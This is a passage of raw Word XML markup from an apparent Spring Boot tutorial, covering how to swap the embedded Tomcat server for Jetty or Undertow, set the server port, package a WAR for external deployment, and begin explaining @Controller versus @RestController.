          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the default embedded server. To change it to another server like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jetty</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you need to add the respective dependency and configure it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10043CB4"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Switch to Jetty:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D998A1A"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To switch to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jetty</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5653D09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Exclude the Tomcat dependency and add the Jetty dependency in pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68757C07"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For Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E241692"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lt;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4982CCCF"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 Exclude Tomcat (default) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7FF16"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A01B95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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2F5FD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artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477BDDD2"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exclusions&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F995A8"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exclusion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF3C1B"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE184D8"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artifactId&gt;spring-boot-starter-tomcat&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB20C5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exclusion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F5298"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exclusions&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166082E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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A0713" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3E17C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 Add Jetty --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12221544"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4096967D"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C180982"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artifactId&gt;spring-boot-starter-jetty&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7131A0BB"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F02457"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lt;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AEE190"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For Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1047DA"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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA13776"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implementation('org.springframework.boot:spring-boot-starter-web') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD9655C"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exclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B125CCD"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1A7F1145"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implementation 'org.springframework.boot:spring-boot-starter-jetty'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C65405"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2E91F007"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Now, the application will run on Jetty instead of Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1F677"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Switch to Undertow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948F65D"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To switch to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, follow a similar process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F204465"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For Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ECC522"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lt;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D539F8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 Exclude Tomcat (default) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1B4FA9"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECBF5E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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A4EA19"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artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB57276"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exclusions&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F4E73F"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exclusion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B580F36"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4C74B8"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artifactId&gt;spring-boot-starter-tomcat&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C26721C"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exclusion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F49004"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exclusions&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56459609"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699B408" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119C6BC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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;!-- Add Undertow --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E06998"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143FC90F"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E10F9F2"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artifactId&gt;spring-boot-starter-undertow&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C51AD48"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04715A15"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lt;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B999094"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For Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C330B"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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4EE618"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implementation('org.springframework.boot:spring-boot-starter-web') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DDE9E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exclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6426A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692CA52B"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implementation 'org.springframework.boot:spring-boot-starter-undertow'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C95928"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776E3B0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Now, the application will run on Undertow instead of Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA8FB8"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2. Change the Server Port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC8778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To change the port on which the Spring Boot application listens, you can set the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server.port</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> property in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9DA51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Example in application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D4698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erver.port=8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0727F"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Example in application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70955CE8"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erver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A2A44"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ort: 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD4417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is will make the application listen on port 8081 instead of the default port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFD54E"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3. Programmatically Change the Embedded Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62070D3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You can also programmatically change the server in the SpringApplication by setting the desired server type in the SpringApplication context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391F46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boot.SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51591670"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boot.web.servlet.support.SpringBootServletInitializer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEA16D"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boot.web.servlet.context.AnnotationConfigServletWebApplicationContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6943AB29" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640A388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CustomSpringApplication extends SpringBootServletInitializer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772898AB" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B75C657"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046D8F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SpringApplication app = new SpringApplication(CustomSpringApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD473A"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Set a specific server type, e.g., Jetty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A2665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pp.setWebApplicationType(WebApplicationType.SERVLET);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3C20F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pp.run(args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA9BDF"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5CCA8D8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61A56EBB"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4. Using External Server (Traditional Deployment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295D639"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If you want to deploy the application on an external server like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jetty</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Wildfly</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can generate a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file instead of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69481DD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Change the packaging in pom.xml to WAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD0EAF"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lt;packaging&gt;war&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018F9B0"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Ensure your main class extends SpringBootServletInitializer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F8B8F"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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3009D6C0"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MyApplication extends SpringBootServletInitializer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0480498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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890DE30"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SpringApplication.run(MyApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8A8BB"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795E1134" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C70116"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758172F2"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otected SpringApplicationBuilder configure(SpringApplicationBuilder application) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02239279"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application.sources(MyApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6D67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664D8684"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472E6226"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lastRenderedPageBreak/>
        <w:t>Build the WAR file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597830BB"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mvn clean install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F26978"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Deploy the WAR file on the server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., deploy on Tomcat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5243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is way, you can run your Spring Boot application on an external server instead of the embedded one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C3DE9"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFCFE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You can change the server in Spring Boot by adding the necessary dependencies (like Jetty or Undertow) and excluding the default embedded Tomcat server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C712C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You can configure the server port using server.port property in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D292C6C"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For traditional deployment, change the packaging to WAR and extend SpringBootServletInitializer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0F81E" w14:textId="36148FF0"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79624F4">
          <v:rect id="_x0000_i2520" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="501ED36D" w14:textId="460AD4BC" w:rsidR="00D05936" w:rsidRPr="00CE4B95" w:rsidRDefault="00F029AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="584" w:name="_Toc196308064"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00F95AEE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between @Controller and @RestController</w:t>
      </w:r>
      <w:r w:rsidR="00D05936" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="584"/>
    </w:p>
    <w:p w14:paraId="2F40082B" w14:textId="53A5BF9B" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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 difference between @Controller and @RestController in Spring lies in how they handle HTTP responses and the type of data they return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46861736"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1. @Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135584C"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ed for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is used to define a Spring MVC controller that handles web requests and returns a view (typically JSP, Thymeleaf, or other templating engines).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168921BF"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esponse Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: By default, @Controller returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>view name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and Spring resolves the view using a view resolver. It can also return data using @ResponseBody if you want to return JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E05077"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Typical Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to create traditional web applications that serve dynamic web pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BA1ED"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FFB986"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ntroller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7CF48B"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE2814" w14:textId="77777777" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511447DA"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questMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215661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String hello(Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F954EB"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model.addAttribute("message", "Hello, World!");</w:t>
      </w:r>
    </w:p>
